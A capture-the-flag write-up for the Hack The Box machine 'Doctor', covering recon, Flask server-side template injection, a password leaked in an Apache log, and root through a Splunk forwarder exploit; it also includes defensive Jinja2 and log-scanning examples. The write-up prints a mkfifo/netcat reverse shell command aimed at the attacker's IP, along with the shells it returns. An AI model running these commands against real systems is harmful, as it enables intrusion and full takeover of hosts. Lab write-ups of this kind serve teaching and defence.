Doctor is a Linux machine rated as easy on Hack The Box. It consists of finding a virtual host that serves a messaging service vulnerable to server-side template injection (SSTI); after obtaining access, a root shell can be obtained by abusing the Splunk forwarder.
Running nmap:

```
nmap -sC -sV doctor.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST
Nmap scan report for doctor.htb (10.129.18.114)
Host is up (0.047s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Browsing to port 80 we find the following page:

Scrolling down a bit we can see an email address, email@example.com, so I added its domain to my hosts file, since it could be a virtual host.

Browsing to doctors.htb we are greeted with a login form, but there is an option to register new users:

So we can create an account and access the site:

Once logged in we can create messages:

Now we can use gobuster to discover hidden directories:
```
gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/register (Status: 200)
/account (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/home (Status: 302)
/logout (Status: 302)
```
Browsing to /archive it seems to be empty, but inspecting the source code we can see the title of our message:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
```
Checking Wappalyzer we see the site has been built with Flask on Python 3:

Taking this into account, we can test whether the site is vulnerable to SSTI (server-side template injection). To do so we submit a mathematical expression as a message and then check whether the server evaluated it.

Going to /archive we see the result of the mathematical operation, so the site is vulnerable to SSTI:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
<item><title>14</title></item>
</channel>
```
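To show why the arithmetic probe above gets evaluated, here is an added example (not the box's code) of the bug pattern behind this SSTI and its fix, using Jinja2 directly since that is the engine Flask renders with; the template string and function names are my own, and Jinja2 must be installed.

```python
from jinja2 import Environment

# Flask renders through Jinja2, so the same engine is used here.
env = Environment(autoescape=True)

# Hypothetical archive template: the title is a context variable, not template source.
ARCHIVE_ITEM = "<item><title>{{ title }}</title></item>"


def render_archive_item_vulnerable(title: str) -> str:
    """Bug pattern: the user-supplied title is spliced into the template
    *source*, so Jinja2 parses and executes whatever the user wrote."""
    template_source = "<item><title>" + title + "</title></item>"
    return env.from_string(template_source).render()


def render_archive_item_fixed(title: str) -> str:
    """Fix: the template is a constant and the title arrives as a context
    variable, so it is only ever treated as data (and autoescaped)."""
    return env.from_string(ARCHIVE_ITEM).render(title=title)


if __name__ == "__main__":
    probe = "{{ 7 * 2 }}"  # same kind of arithmetic probe as in the writeup
    print(render_archive_item_vulnerable(probe))  # <title>14</title>: expression was evaluated
    print(render_archive_item_fixed(probe))       # <title>{{ 7 * 2 }}</title>: kept as data
```

In a code review, the thing to look for is any `render_template_string` (or `Environment.from_string`) call whose template argument is built from request data.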
Now we can try to get a Python reverse shell using a payload from PayloadsAllTheThings.

After posting the message we trigger it by browsing to /archive; checking netcat, we get a reverse shell as web:

```
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
$ whoami
web
```
Now we need to pivot to the other user, shaun:

```
web@doctor:/home$ ls
shaun  web
```
Inside the apache2 log folder there was a file called backup which caught my attention:

```
web@doctor:/var/log/apache2$ ls
access.log        access.log.6.gz  error.log.11.gz  error.log.6.gz
access.log.1      access.log.7.gz  error.log.12.gz  error.log.7.gz
access.log.10.gz  access.log.8.gz  error.log.13.gz  error.log.8.gz
access.log.11.gz  access.log.9.gz  error.log.14.gz  error.log.9.gz
access.log.2.gz   backup           error.log.2.gz   other_vhosts_access.log
access.log.3.gz   error.log        error.log.3.gz
access.log.4.gz   error.log.1      error.log.4.gz
access.log.5.gz   error.log.10.gz  error.log.5.gz
```
Grepping for "password" inside it we find a credential that a user had typed into the wrong field of the password-reset form, which ended up in the logged request line and lets us pivot to shaun:

```
web@doctor:/var/log/apache2$ cat backup | grep password
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
```
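The leak above is worth hunting for proactively: Apache logs the request line verbatim, so any parameter sent in the URL of a credential-handling endpoint lands in the access log readable by the adm group. As an added example (not from the writeup), this stdlib-only script parses combined-format log lines and flags such requests; the set of sensitive paths is an assumption, and the sample lines are constructed apart from the one quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined/common log format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^"\s]+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints that handle credentials (assumed list, not taken from the box).
CREDENTIAL_PATHS = {"/login", "/register", "/reset_password", "/account"}


def find_query_string_leaks(lines, sensitive_paths=CREDENTIAL_PATHS):
    """Return (ip, time, method, path, params) for requests to sensitive
    endpoints that carried parameters in the URL instead of the body."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        if parts.path in sensitive_paths and parts.query:
            findings.append((m.group("ip"), m.group("time"), m.group("method"),
                             parts.path, parse_qs(parts.query)))
    return findings


# Constructed sample: the second line is the one from the writeup, the others are benign filler.
SAMPLE_LOG = [
    '10.10.14.4 - - [05/Sep/2020:11:16:02 +2000] "GET /login HTTP/1.1" 200 1893 "-" "Mozilla/5.0"',
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    '10.10.14.4 - - [05/Sep/2020:11:18:10 +2000] "GET /archive?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, method, path, params in find_query_string_leaks(SAMPLE_LOG):
        print(f"{ts} {ip} {method} {path} has parameters in the URL: {params}")
```

The fix on the application side is to accept credential fields only in the request body; on the logging side, rotated logs and ad-hoc "backup" copies should not be world- or group-readable.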
Going back to the nmap scan, we found that port 8089 was open running Splunk.
Inside the /opt directory there was another directory called splunkforwarder:

```
shaun@doctor:/opt$ ls
clean  splunkforwarder
```
Searching for splunkforwarder privilege escalation, I came across the following exploit:

This GitHub repo contains two exploits, a local and a remote one. Since the exploit was written in Python 2 and the machine only had Python 3, I decided to go with the remote exploit.

This exploit abuses the Splunk Universal Forwarder by configuring it to use our machine as its deployment server; once the forwarder connects, our machine serves malicious code as a deployment application.

To run the exploit remotely we need to use shaun's credentials instead of the default ones, and then we can specify the payload to obtain a reverse shell through netcat.

Running the exploit:
```
python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f'
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.161:8181/
10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
```
Checking netcat, we have obtained a root shell:

```
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
doctor
```